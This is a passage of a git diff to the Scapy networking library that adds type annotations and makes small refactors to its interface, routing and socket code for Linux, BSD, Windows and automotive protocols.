ARPHDR_LOOPBACK, IPV6_ADDR_GLOBAL -from scapy.compat import orb - -# Duplicated from scapy/utils.py for import reasons +# Typing imports +from scapy.compat import ( + Optional, + Union, +) + +# Note: the typing of this file is heavily ignored because MyPy doesn't allow +# to import the same function from different files. + +# This list only includes imports that are common across all platforms. +__all__ = [ # noqa: F405 + "get_if_addr", + "get_if_addr6", + "get_if_hwaddr", + "get_if_list", + "get_if_raw_addr", + "get_if_raw_addr6", + "get_if_raw_hwaddr", + "get_working_if", + "in6_getifaddr", + "read_routes", + "read_routes6", +] + +# BACKWARD COMPATIBILITY +from scapy.interfaces import ( + get_if_list, + get_working_if, +) + + +# We build the utils functions BEFORE importing the underlying handlers +# because they might be themselves imported within the arch/ folder. def str2mac(s): + # Duplicated from scapy/utils.py for import reasons + # type: (str) -> str return ("%02x:" * 6)[:-1] % tuple(orb(x) for x in s) def get_if_addr(iff): + # type: (str) -> str """ Returns the IPv4 of an interface or "0.0.0.0" if not available """ @@ -32,53 +67,19 @@ def get_if_addr(iff): def get_if_hwaddr(iff): + # type: (Union[NetworkInterface, str]) -> str """ Returns the MAC (hardware) address of an interface """ - addrfamily, mac = get_if_raw_hwaddr(iff) # noqa: F405 + addrfamily, mac = get_if_raw_hwaddr(iff) # type: ignore # noqa: F405 if addrfamily in [ARPHDR_ETHER, ARPHDR_LOOPBACK]: return str2mac(mac) else: raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily, iff)) # noqa: E501 -# Next step is to import following architecture specific functions: -# def get_if_raw_hwaddr(iff) -# def get_if_raw_addr(iff): -# def get_if_list(): -# def get_working_if(): -# def attach_filter(s, filter, iface): -# def set_promisc(s,iff,val=1): -# def read_routes(): -# def read_routes6(): -# def get_if(iff,cmd): -# def get_if_index(iff): - -from scapy.interfaces import get_working_if # noqa F401 - -if LINUX: - from scapy.arch.linux import * # noqa F403 -elif BSD: - from scapy.arch.unix import read_routes, read_routes6, in6_getifaddr # noqa: F401, E501 - from scapy.arch.bpf.core import * # noqa F403 - if not conf.use_pcap: - # Native - from scapy.arch.bpf.supersocket import * # noqa F403 - conf.use_bpf = True -elif SOLARIS: - from scapy.arch.solaris import * # noqa F403 -elif WINDOWS: - from scapy.arch.windows import * # noqa F403 - from scapy.arch.windows.native import * # noqa F403 - - -_set_conf_sockets() # Apply config - -if LINUX or BSD: - conf.load_layers.append("tuntap") - - def get_if_addr6(iff): + # type: (NetworkInterface) -> Optional[str] """ Returns the main global unicast address associated with provided interface, in human readable form. If no global address is found, @@ -89,6 +90,7 @@ def get_if_addr6(iff): def get_if_raw_addr6(iff): + # type: (NetworkInterface) -> Optional[bytes] """ Returns the main global unicast address associated with provided interface, in network format. If no global address is found, None @@ -99,3 +101,35 @@ def get_if_raw_addr6(iff): return inet_pton(socket.AF_INET6, ip6) return None + + +# Next step is to import following architecture specific functions: +# def attach_filter(s, filter, iface) +# def get_if(iff,cmd) +# def get_if_index(iff) +# def get_if_raw_addr(iff) +# def get_if_raw_hwaddr(iff) +# def in6_getifaddr() +# def read_routes() +# def read_routes6() +# def set_promisc(s,iff,val=1) + +if LINUX: + from scapy.arch.linux import * # noqa F403 +elif BSD: + from scapy.arch.unix import read_routes, read_routes6, in6_getifaddr # noqa: E501 + from scapy.arch.bpf.core import * # noqa F403 + if not conf.use_pcap: + # Native + from scapy.arch.bpf.supersocket import * # noqa F403 + conf.use_bpf = True +elif SOLARIS: + from scapy.arch.solaris import * # noqa F403 +elif WINDOWS: + from scapy.arch.windows import * # noqa F403 + from scapy.arch.windows.native import * # noqa F403 + +if LINUX or BSD: + conf.load_layers.append("tuntap") + +_set_conf_sockets() # Apply config diff --git a/scapy/arch/common.py b/scapy/arch/common.py index ee570f2f668..79649687bae 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -15,7 +15,19 @@ from scapy.config import conf from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT from scapy.error import Scapy_Exception -from scapy.interfaces import network_name +from scapy.interfaces import network_name, NetworkInterface +from scapy.libs.structures import bpf_program + +# Type imports +import scapy +from scapy.compat import ( + Callable, + List, + Optional, + Tuple, + TypeVar, + Union, +) if not WINDOWS: from fcntl import ioctl @@ -48,6 +60,7 @@ def get_if(iff, cmd): + # type: (Union[NetworkInterface, str], int) -> bytes """Ease SIOCGIF* ioctl calls""" iff = network_name(iff) @@ -58,7 +71,10 @@ def get_if(iff, cmd): sck.close() -def get_if_raw_hwaddr(iff, siocgifhwaddr=None): +def get_if_raw_hwaddr(iff, # type: Union[NetworkInterface, str] + siocgifhwaddr=None, # type: Optional[int] + ): + # type: (...) -> Tuple[int, bytes] """Get the raw MAC address of a local interface. This function uses SIOCGIFHWADDR calls, therefore only works @@ -68,32 +84,47 @@ def get_if_raw_hwaddr(iff, siocgifhwaddr=None): :returns: the corresponding raw MAC address """ if siocgifhwaddr is None: - from scapy.arch import SIOCGIFHWADDR + from scapy.arch import SIOCGIFHWADDR # type: ignore siocgifhwaddr = SIOCGIFHWADDR - return struct.unpack("16xh6s8x", get_if(iff, siocgifhwaddr)) + return struct.unpack( # type: ignore + "16xh6s8x", + get_if(iff, siocgifhwaddr) + ) # SOCKET UTILS -def _select_nonblock(sockets, remain=None): +_T = TypeVar("_T") + + +def _select_nonblock(sockets, # type: List[_T] + remain=None # type: Optional[int] + ): + # type: (...) -> Tuple[List[_T], Callable[['scapy.supersocket.SuperSocket'], Optional['scapy.packet.Packet']]] # type: ignore # noqa: E501 """This function is called during sendrecv() routine to select the available sockets. """ # pcap sockets aren't selectable, so we return all of them # and ask the selecting functions to use nonblock_recv instead of recv - def _sleep_nonblock_recv(self): - res = self.nonblock_recv() + def _sleep_nonblock_recv(self # type: 'scapy.supersocket.SuperSocket' + ): + # type: (...) -> 'Optional[scapy.packet.Packet]' + res = self.nonblock_recv() # type: ignore if res is None: time.sleep(conf.recv_poll_rate) - return res + return res # type: ignore # we enforce remain=None: don't wait. return sockets, _sleep_nonblock_recv # BPF HANDLERS -def compile_filter(filter_exp, iface=None, linktype=None, - promisc=False): +def compile_filter(filter_exp, # type: str + iface=None, # type: Optional[Union[str, 'scapy.interfaces.NetworkInterface']] # noqa: E501 + linktype=None, # type: Optional[int] + promisc=False # type: bool + ): + # type: (...) -> bpf_program """Asks libpcap to parse the filter, then build the matching BPF bytecode. @@ -108,7 +139,6 @@ def compile_filter(filter_exp, iface=None, linktype=None, pcap_compile_nopcap, pcap_close ) - from scapy.libs.structures import bpf_program except OSError: raise ImportError( "libpcap is not available. Cannot compile filter !" @@ -139,10 +169,9 @@ def compile_filter(filter_exp, iface=None, linktype=None, ) elif iface: err = create_string_buffer(PCAP_ERRBUF_SIZE) - iface = network_name(iface) - iface = create_string_buffer(iface.encode("utf8")) + iface_b = create_string_buffer(network_name(iface).encode("utf8")) pcap = pcap_open_live( - iface, MTU, promisc, 0, err + iface_b, MTU, promisc, 0, err ) error = bytes(bytearray(err)).strip(b"\x00") if error: diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index af78f7e0a9a..88f0de80167 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -10,23 +10,28 @@ from __future__ import absolute_import +from fcntl import ioctl +from select import select + import array import ctypes -from fcntl import ioctl import os -from select import select import socket import struct +import subprocess import sys import time -import subprocess - -from scapy.compat import raw, plain_str -from scapy.consts import LINUX import scapy.utils import scapy.utils6 -from scapy.arch.common import get_if, compile_filter, _iff_flags +from scapy.compat import raw, plain_str +from scapy.consts import LINUX +from scapy.arch.common import ( + _iff_flags, + compile_filter, + get_if, + get_if_raw_hwaddr, +) from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS @@ -47,7 +52,18 @@ import scapy.modules.six as six from scapy.modules.six.moves import range -from scapy.arch.common import get_if_raw_hwaddr # noqa: F401 +# Typing imports +from scapy.compat import ( + Any, + Callable, + Dict, + List, + NoReturn, + Optional, + Tuple, + Type, + Union, +) # From bits/ioctls.h SIOCGIFHWADDR = 0x8927 # Get hardware address @@ -104,6 +120,7 @@ def get_if_raw_addr(iff): + # type: (Union[NetworkInterface, str]) -> bytes r""" Return the raw IPv4 address of an interface. If unavailable, returns b"\0\0\0\0" @@ -115,6 +132,7 @@ def get_if_raw_addr(iff): def _get_if_list(): + # type: () -> List[str] """ Function to read the interfaces from /proc/net/dev """ @@ -131,13 +149,13 @@ def _get_if_list(): f.readline() f.readline() for line in f: - line = plain_str(line) - lst.append(line.split(":")[0].strip()) + lst.append(plain_str(line).split(":")[0].strip()) f.close() return lst def attach_filter(sock, bpf_filter, iface): + # type: (socket.socket, str, Union[NetworkInterface, str]) -> None """ Compile bpf filter and attach it to a socket @@ -146,7 +164,7 @@ def attach_filter(sock, bpf_filter, iface): :param iface: the interface used to compile """ bp = compile_filter(bpf_filter, iface) - if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): + if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): # type: ignore # PyPy < 7.3.2 has a broken behavior # https://foss.heptapod.net/pypy/pypy/-/issues/3298 bp = struct.pack( @@ -159,6 +177,7 @@ def attach_filter(sock, bpf_filter, iface): def set_promisc(s, iff, val=1): + # type: (socket.socket, Union[NetworkInterface, str], int) -> None mreq = struct.pack("IHH8s", get_if_index(iff), PACKET_MR_PROMISC, 0, b"") if val: cmd = PACKET_ADD_MEMBERSHIP @@ -167,7 +186,12 @@ def set_promisc(s, iff, val=1): s.setsockopt(SOL_PACKET, cmd, mreq) -def get_alias_address(iface_name, ip_mask, gw_str, metric): +def get_alias_address(iface_name, # type: str + ip_mask, # type: int + gw_str, # type: str + metric # type: int + ): + # type: (...) -> Optional[Tuple[int, int, str, str, str, int]] """ Get the correct source IP address of an interface alias """ @@ -180,29 +204,29 @@ def get_alias_address(iface_name, ip_mask, gw_str, metric): # Retrieve interfaces structures sck = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - names = array.array('B', b'\0' * 4096) + names_ar = array.array('B', b'\0' * 4096) ifreq = ioctl(sck.fileno(), SIOCGIFCONF, - struct.pack("iL", len(names), names.buffer_info()[0])) + struct.pack("iL", len(names_ar), names_ar.buffer_info()[0])) # Extract interfaces names out = struct.unpack("iL", ifreq)[0] - names = names.tobytes() if six.PY3 else names.tostring() - names = [names[i:i + offset].split(b'\0', 1)[0] for i in range(0, out, name_len)] # noqa: E501 + names_b = names_ar.tobytes() if six.PY3 else names_ar.tostring() + names = [names_b[i:i + offset].split(b'\0', 1)[0] for i in range(0, out, name_len)] # noqa: E501 # Look for the IP address - for ifname in names: + for ifname_b in names: + ifname = plain_str(ifname_b) # Only look for a matching interface name - if not ifname.decode("utf8").startswith(iface_name): + if not ifname.startswith(iface_name): continue # Retrieve and convert addresses - ifreq = ioctl(sck, SIOCGIFADDR, struct.pack("16s16x", ifname)) - ifaddr = struct.unpack(">I", ifreq[20:24])[0] - ifreq = ioctl(sck, SIOCGIFNETMASK, struct.pack("16s16x", ifname)) - msk = struct.unpack(">I", ifreq[20:24])[0] + ifreq = ioctl(sck, SIOCGIFADDR, struct.pack("16s16x", ifname_b)) + ifaddr = struct.unpack(">I", ifreq[20:24])[0] # type: int + ifreq = ioctl(sck, SIOCGIFNETMASK, struct.pack("16s16x", ifname_b)) + msk = struct.unpack(">I", ifreq[20:24])[0] # type: int # Get the full interface name - ifname = plain_str(ifname) if ':' in ifname: ifname = ifname[:ifname.index(':')] else: @@ -215,10 +239,11 @@ def get_alias_address(iface_name, ip_mask, gw_str, metric): scapy.utils.ltoa(ifaddr), metric) sck.close() - return + return None def read_routes(): + # type: () -> List[Tuple[int, int, str, str, str, int]] try: f = open("/proc/net/route", "rb") except IOError: @@ -243,10 +268,10 @@ def read_routes(): else: warning("Interface %s: failed to get address config (%s)" % (conf.loopback_name, str(err))) # noqa: E501 - for line in f.readlines()[1:]: - line = plain_str(line) - iff, dst, gw, flags, _, _, metric, msk, _, _, _ = line.split() - flags = int(flags, 16) + for line_b in f.readlines()[1:]: + line = plain_str(line_b) + iff, dst_b, gw, flags_b, _, _, metric_b, msk_b, _, _, _ = line.split() + flags = int(flags_b, 16) if flags & RTF_UP == 0: continue if flags & RTF_REJECT: @@ -266,17 +291,17 @@ def read_routes(): continue # Attempt to detect an interface alias based on addresses inconsistencies # noqa: E501 - dst_int = socket.htonl(int(dst, 16)) & 0xffffffff - msk_int = socket.htonl(int(msk, 16)) & 0xffffffff + dst_int = socket.htonl(int(dst_b, 16)) & 0xffffffff + msk_int = socket.htonl(int(msk_b, 16)) & 0xffffffff gw_str = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) - metric = int(metric) + metric = int(metric_b) - route = [dst_int, msk_int, gw_str, iff, ifaddr, metric] + route = (dst_int, msk_int, gw_str, iff, ifaddr, metric) if ifaddr_int & msk_int != dst_int: tmp_route = get_alias_address(iff, dst_int, gw_str, metric) if tmp_route: route = tmp_route - routes.append(tuple(route)) + routes.append(route) f.close() s.close() @@ -288,6 +313,7 @@ def read_routes(): def in6_getifaddr(): + # type: () -> List[Tuple[str, int, str]] """ Returns a list of 3-tuples of the form (addr, scope, iface) where 'addr' is the address of scope 'scope' associated to the interface @@ -296,7 +322,7 @@ def in6_getifaddr(): This is the list of all addresses of all interfaces available on the system. """ - ret = [] + ret = [] # type: List[Tuple[str, int, str]] try: fdesc = open("/proc/net/if_inet6", "rb") except IOError: @@ -316,6 +342,7 @@ def in6_getifaddr(): def read_routes6(): + # type: () -> List[Tuple[str, int, str, str, List[str], int]] try: f = open("/proc/net/ipv6_route", "rb") except IOError: @@ -333,25 +360,26 @@ def read_routes6(): routes = [] def proc2r(p): + # type: (bytes) -> str ret = struct.unpack('4s4s4s4s4s4s4s4s', p) - ret = b':'.join(ret).decode() - return scapy.utils6.in6_ptop(ret) + addr = b':'.join(ret).decode() + return scapy.utils6.in6_ptop(addr) lifaddr = in6_getifaddr() for line in f.readlines(): - d, dp, _, _, nh, metric, rc, us, fl, dev = line.split() - metric = int(metric, 16) - fl = int(fl, 16) - dev = plain_str(dev) + d_b, dp_b, _, _, nh_b, metric_b, rc, us, fl_b, dev_b = line.split() + metric = int(metric_b, 16) + fl = int(fl_b, 16) + dev = plain_str(dev_b) if fl & RTF_UP == 0: continue if fl & RTF_REJECT: continue - d = proc2r(d) - dp = int(dp, 16) - nh = proc2r(nh) + d = proc2r(d_b) + dp = int(dp_b, 16) + nh = proc2r(nh_b) cset = [] # candidate set (possible source addresses) if dev == conf.loopback_name: @@ -369,6 +397,7 @@ def proc2r(p): def get_if_index(iff): + # type: (Union[NetworkInterface, str]) -> int return int(struct.unpack("I", get_if(iff, SIOCGIFINDEX)[16:20])[0]) @@ -376,9 +405,11 @@ class LinuxInterfaceProvider(InterfaceProvider): name = "sys" def _is_valid(self, dev): + # type: (NetworkInterface) -> bool return bool(dev.flags & IFF_UP) def load(self): + # type: () -> Dict[str, NetworkInterface] from scapy.fields import FlagValue data = {} ips = in6_getifaddr() @@ -388,6 +419,7 @@ def load(self): mac = scapy.utils.str2mac( get_if_raw_hwaddr(i, siocgifhwaddr=SIOCGIFHWADDR)[1] ) + ip = None # type: Optional[str] ip = inet_ntop(socket.AF_INET, get_if_raw_addr(i)) if ip == "0.0.0.0": ip = None @@ -410,19 +442,20 @@ def load(self): if os.uname()[4] in ['x86_64', 'aarch64']: def get_last_packet_timestamp(sock): - ts = ioctl(sock, SIOCGSTAMP, "1234567890123456") - s, us = struct.unpack("QQ", ts) + # type: (socket.socket) -> float + ts = ioctl(sock, SIOCGSTAMP, "1234567890123456") # type: ignore + s, us = struct.unpack("QQ", ts) # type: Tuple[int, int] return s + us / 1000000.0 else: def get_last_packet_timestamp(sock): - ts = ioctl(sock, SIOCGSTAMP, "12345678") - s, us = struct.unpack("II", ts) + # type: (socket.socket) -> float + ts = ioctl(sock, SIOCGSTAMP, "12345678") # type: ignore + s, us = struct.unpack("II", ts) # type: Tuple[int, int] return s + us / 1000000.0 def _flush_fd(fd): - if hasattr(fd, 'fileno'): - fd = fd.fileno() + # type: (int) -> None while True: r, w, e = select([fd], [], [], 0) if r: @@ -434,8 +467,15 @@ def _flush_fd(fd): class L2Socket(SuperSocket): desc = "read/write packets at layer 2 using Linux PF_PACKET sockets" - def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, - nofilter=0, monitor=None): + def __init__(self, + iface=None, # type: Optional[Union[str, NetworkInterface]] + type=ETH_P_ALL, # type: int + promisc=None, # type: Optional[Any] + filter=None, # type: Optional[Any] + nofilter=0, # type: int + monitor=None, # type: Optional[Any] + ): + # type: (...) -> None self.iface = network_name(iface or conf.iface) self.type = type self.promisc = conf.sniff_promisc if promisc is None else promisc @@ -454,13 +494,13 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, filter = "not (%s)" % conf.except_filter if filter is not None: try: - attach_filter(self.ins, filter, iface) + attach_filter(self.ins, filter, self.iface) except ImportError as ex: log_runtime.error("Cannot set filter: %s", ex) if self.promisc: set_promisc(self.ins, self.iface) self.ins.bind((self.iface, type)) - _flush_fd(self.ins) + _flush_fd(self.ins.fileno()) self.ins.setsockopt( socket.SOL_SOCKET, socket.SO_RCVBUF, @@ -481,21 +521,21 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Linux 2.6.21 msg = "Your Linux Kernel does not support Auxiliary Data!" log_runtime.info(msg) - if isinstance(self, L2ListenSocket): - self.outs = None - else: - self.outs = self.ins + if not isinstance(self, L2ListenSocket): + self.outs = self.ins # type: socket.socket self.outs.setsockopt( socket.SOL_SOCKET, socket.SO_SNDBUF, conf.bufsize ) + else: + self.outs = None # type: ignore sa_ll = self.ins.getsockname() if sa_ll[3] in conf.l2types: - self.LL = conf.l2types[sa_ll[3]] + self.LL = conf.l2types.num2layer[sa_ll[3]] self.lvl = 2 elif sa_ll[1] in conf.l3types: - self.LL = conf.l3types[sa_ll[1]] + self.LL = conf.l3types.num2layer[sa_ll[1]] self.lvl = 3 else: self.LL = conf.default_l2 @@ -503,6 +543,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, warning("Unable to guess type (interface=%s protocol=%#x family=%i). Using %s", sa_ll[0], sa_ll[1], sa_ll[3], self.LL.name) # noqa: E501 def close(self): + # type: () -> None if self.closed: return try: @@ -513,6 +554,7 @@ def close(self): SuperSocket.close(self) def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """Receives a packet, then returns a tuple containing (cls, pkt_data, time)""" # noqa: E501 pkt, sa_ll, ts = self._recv_raw(self.ins, x) if self.outs and sa_ll[2] == socket.PACKET_OUTGOING: @@ -522,6 +564,7 @@ def recv_raw(self, x=MTU): return self.LL, pkt, ts def send(self, x): + # type: (Packet) -> int try: return SuperSocket.send(self, x) except socket.error as msg: @@ -538,6 +581,7 @@ class L2ListenSocket(L2Socket): desc = "read packets at layer 2 using Linux PF_PACKET sockets. Also receives the packets going OUT" # noqa: E501 def send(self, x): + # type: (Packet) -> NoReturn raise Scapy_Exception("Can't send anything with L2ListenSocket") @@ -545,6 +589,7 @@ class L3PacketSocket(L2Socket): desc = "read/write packets at layer 3 using Linux PF_PACKET sockets" def recv(self, x=MTU): + # type: (int) -> Optional[Packet] pkt = SuperSocket.recv(self, x) if pkt and self.lvl == 2: pkt.payload.time = pkt.time @@ -552,18 +597,19 @@ def recv(self, x=MTU): return pkt def send(self, x): + # type: (Packet) -> int iff = x.route()[0] if iff is None: iff = conf.iface sdto = (iff, self.type) self.outs.bind(sdto) sn = self.outs.getsockname() - ll = lambda x: x + ll = lambda x: x # type: Callable[[Packet], Packet] type_x = type(x) if type_x in conf.l3types: - sdto = (iff, conf.l3types[type_x]) + sdto = (iff, conf.l3types.layer2num[type_x]) if sn[3] in conf.l2types: - ll = lambda x: conf.l2types[sn[3]]() / x + ll = lambda x: conf.l2types.num2layer[sn[3]]() / x if self.lvl == 3 and type_x != self.LL: warning("Incompatible L3 types detected using %s instead of %s !", type_x, self.LL) @@ -571,13 +617,17 @@ def send(self, x): sx = raw(ll(x)) x.sent_time = time.time() try: - self.outs.sendto(sx, sdto) + return self.outs.sendto(sx, sdto) except socket.error as msg: if msg.errno == 22 and len(sx) < conf.min_pkt_size: - self.outs.send(sx + b"\x00" * (conf.min_pkt_size - len(sx))) + return self.outs.send( + sx + b"\x00" * (conf.min_pkt_size - len(sx)) + ) elif conf.auto_fragment and msg.errno == 90: + i = 0 for p in x.fragment(): - self.outs.sendto(raw(ll(p)), sdto) + i += self.outs.sendto(raw(ll(p)), sdto) + return i else: raise @@ -588,7 +638,7 @@ class VEthPair(object): """ def __init__(self, iface_name, peer_name): - + # type: (str, str) -> None if not LINUX: # ToDo: do we need a kernel version check here? raise ScapyInvalidPlatformException( @@ -598,12 +648,15 @@ def __init__(self, iface_name, peer_name): self.ifaces = [iface_name, peer_name] def iface(self): + # type: () -> str return self.ifaces[0] def peer(self): + # type: () -> str return self.ifaces[1] def setup(self): + # type: () -> None """ create veth pair links :raises subprocess.CalledProcessError if operation fails @@ -611,6 +664,7 @@ def setup(self): subprocess.check_call(['ip', 'link', 'add', self.ifaces[0], 'type', 'veth', 'peer', 'name', self.ifaces[1]]) # noqa: E501 def destroy(self): + # type: () -> None """ remove veth pair links :raises subprocess.CalledProcessError if operation fails @@ -618,6 +672,7 @@ def destroy(self): subprocess.check_call(['ip', 'link', 'del', self.ifaces[0]]) def up(self): + # type: () -> None """ set veth pair links up :raises subprocess.CalledProcessError if operation fails @@ -626,6 +681,7 @@ def up(self): subprocess.check_call(["ip", "link", "set", self.ifaces[idx], "up"]) # noqa: E501 def down(self): + # type: () -> None """ set veth pair links down :raises subprocess.CalledProcessError if operation fails @@ -634,11 +690,13 @@ def down(self): subprocess.check_call(["ip", "link", "set", self.ifaces[idx], "down"]) # noqa: E501 def __enter__(self): + # type: () -> VEthPair self.setup() self.up() conf.ifaces.reload() return self def __exit__(self, exc_type, exc_val, exc_tb): + # type: (Any, Any, Any) -> None self.destroy() conf.ifaces.reload() diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 3d289c02395..8a06faa0d7a 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -12,7 +12,6 @@ import scapy.config import scapy.utils -from scapy.arch import get_if_addr from scapy.config import conf from scapy.consts import FREEBSD, NETBSD, OPENBSD, SOLARIS from scapy.error import log_runtime, warning @@ -20,12 +19,21 @@ from scapy.utils6 import in6_getscope, construct_source_candidate_set from scapy.utils6 import in6_isvalid, in6_ismlladdr, in6_ismnladdr +# Typing imports +from scapy.compat import ( + List, + Optional, + Tuple, + Union, +) + ################## # Routes stuff # ################## def _guess_iface_name(netif): + # type: (str) -> Optional[str] """ We attempt to guess the name of interfaces that are truncated from the output of ifconfig -l. @@ -42,6 +50,7 @@ def _guess_iface_name(netif): def read_routes(): + # type: () -> List[Tuple[int, int, str, str, str, int]] """Return a list of IPv4 routes than can be used by Scapy. This function parses netstat. @@ -57,8 +66,8 @@ def read_routes(): prio_present = False refs_present = False use_present = False - routes = [] - pending_if = [] + routes = [] # type: List[Tuple[int, int, str, str, str, int]] + pending_if = [] # type: List[Tuple[int, int, str]] for line in f.readlines(): if not line: break @@ -77,40 +86,41 @@ def read_routes(): break rt = line.split() if SOLARIS: - dest, netmask, gw, netif = rt[:4] + dest_, netmask_, gw, netif = rt[:4] flg = rt[4 + mtu_present + refs_present] else: - dest, gw, flg = rt[:3] + dest_, gw, flg = rt[:3] locked = OPENBSD and rt[6] == "l" offset = mtu_present + prio_present + refs_present + locked offset += use_present netif = rt[3 + offset] if flg.find("lc") >= 0: continue - elif dest == "default": + elif dest_ == "default": dest = 0 netmask = 0 elif SOLARIS: - dest = scapy.utils.atol(dest) - netmask = scapy.utils.atol(netmask) + dest = scapy.utils.atol(dest_) + netmask = scapy.utils.atol(netmask_) else: - if "/" in dest: - dest, netmask = dest.split("/") - netmask = scapy.utils.itom(int(netmask)) + if "/" in dest_: + dest_, netmask_ = dest_.split("/") + netmask = scapy.utils.itom(int(netmask_)) else: - netmask = scapy.utils.itom((dest.count(".") + 1) * 8) - dest += ".0" * (3 - dest.count(".")) - dest = scapy.utils.atol(dest) + netmask = scapy.utils.itom((dest_.count(".") + 1) * 8) + dest_ += ".0" * (3 - dest_.count(".")) + dest = scapy.utils.atol(dest_) # XXX: TODO: add metrics for unix.py (use -e option on netstat) metric = 1 if "g" not in flg: gw = '0.0.0.0' if netif is not None: + from scapy.arch import get_if_addr try: ifaddr = get_if_addr(netif) routes.append((dest, netmask, gw, netif, ifaddr, metric)) except OSError as exc: - if exc.message == 'Device not configured': + if 'Device not configured' in str(exc): # This means the interface name is probably truncated by # netstat -nr. We attempt to guess it's name and if not we # ignore it. @@ -134,8 +144,8 @@ def read_routes(): # know their output interface for dest, netmask, gw in pending_if: gw_l = scapy.utils.atol(gw) - max_rtmask, gw_if, gw_if_addr, = 0, None, None - for rtdst, rtmask, _, rtif, rtaddr in routes[:]: + max_rtmask, gw_if, gw_if_addr = 0, None, None + for rtdst, rtmask, _, rtif, rtaddr, _ in routes[:]: if gw_l & rtmask == rtdst: if rtmask >= max_rtmask: max_rtmask = rtmask @@ -143,7 +153,7 @@ def read_routes(): gw_if_addr = rtaddr # XXX: TODO add metrics metric = 1 - if gw_if: + if gw_if and gw_if_addr: routes.append((dest, netmask, gw, gw_if, gw_if_addr, metric)) else: warning("Did not find output interface to reach gateway %s", gw) @@ -156,6 +166,7 @@ def read_routes(): def _in6_getifaddr(ifname): + # type: (str) -> List[Tuple[str, int, str]] """ Returns a list of IPv6 addresses configured on the interface ifname. """ @@ -192,6 +203,7 @@ def _in6_getifaddr(ifname): def in6_getifaddr(): + # type: () -> List[Tuple[str, int, str]] """ Returns a list of 3-tuples of the form (addr, scope, iface) where 'addr' is the address of scope 'scope' associated to the interface @@ -238,6 +250,7 @@ def in6_getifaddr(): def read_routes6(): + # type: () -> List[Tuple[str, int, str, str, List[str], int]] """Return a list of IPv6 routes than can be used by Scapy. This function parses netstat. @@ -302,7 +315,7 @@ def read_routes6(): next_hop = "::" # Default prefix length - destination_plen = 128 + destination_plen = 128 # type: Union[int, str] # Extract network interface from the zone id if '%' in destination: diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index de9e46266b6..3e640f480c8 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -716,11 +716,16 @@ def _read_routes_c_v1(): This is compatible with XP but won't get IPv6 routes.""" def _extract_ip(obj): return inet_ntop(socket.AF_INET, struct.pack("I", ip))[0] + return ip routes = [] for route in GetIpForwardTable(): ifIndex = route['ForwardIfIndex'] - dest = route['ForwardDest'] - netmask = route['ForwardMask'] + dest = _proc(route['ForwardDest']) + netmask = _proc(route['ForwardMask']) nexthop = _extract_ip(route['ForwardNextHop']) metric = route['ForwardMetric1'] # Build route diff --git a/scapy/config.py b/scapy/config.py index bda89dcdd41..fb64f2fbcdd 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -691,7 +691,7 @@ class Conf(ConfClass): #: if 1, prevents any unwanted packet to go out (ARP, DNS, ...) stealth = "not implemented" #: selects the default output interface for srp() and sendp(). - iface = Interceptor("iface", None, _iface_changer) + iface = Interceptor("iface", None, _iface_changer) # type: 'scapy.interfaces.NetworkInterface' # type: ignore # noqa: E501 layers = LayersList() commands = CommandsList() # type: CommandsList ASN1_default_codec = None #: Codec used by default for ASN1 objects @@ -755,7 +755,7 @@ class Conf(ConfClass): #: holds the Scapy interface list and manager ifaces = None # type: 'scapy.interfaces.NetworkInterfaceDict' #: holds the cache of interfaces loaded from Libpcap - cache_iflist = {} # type: Dict[str, Tuple[str, List[str], int]] + cache_pcapiflist = {} # type: Dict[str, Tuple[str, List[str], int]] neighbor = None # type: 'scapy.layers.l2.Neighbor' # `neighbor` will be filed by scapy.layers.l2 #: holds the Scapy IPv4 routing table and provides methods to diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 5ae30b7aa0b..6d9acf1fdf2 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -11,7 +11,7 @@ import socket import time -from scapy.compat import Tuple, Any, Type +from scapy.compat import Optional, Tuple, Type from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField @@ -99,7 +99,7 @@ def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=ISOTP): self.outputcls = basecls def send(self, x): - # type: (bytes) -> None + # type: (bytes) -> int if not isinstance(x, ISOTP): raise Scapy_Exception( "Please provide a packet class based on ISOTP") @@ -108,10 +108,14 @@ def send(self, x): except AttributeError: pass - super(ISOTP_HSFZSocket, self).send( - HSFZ(src=self.src, dst=self.dst) / x) + return super(ISOTP_HSFZSocket, self).send( + HSFZ(src=self.src, dst=self.dst) / x + ) def recv(self, x=MTU): - # type: (int) -> Any + # type: (int) -> Optional[Packet] pkt = super(ISOTP_HSFZSocket, self).recv(x) - return self.outputcls(bytes(pkt[1])) + if pkt: + return self.outputcls(bytes(pkt.payload)) + else: + return pkt diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index bc423bed793..418d558aabd 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -225,9 +225,9 @@ def send(self, x): return super(UDS_DoIPSocket, self).send(pkt) def recv(self, x=MTU): - # type: (int) -> Packet + # type: (int) -> Optional[Packet] pkt = super(UDS_DoIPSocket, self).recv(x) - if 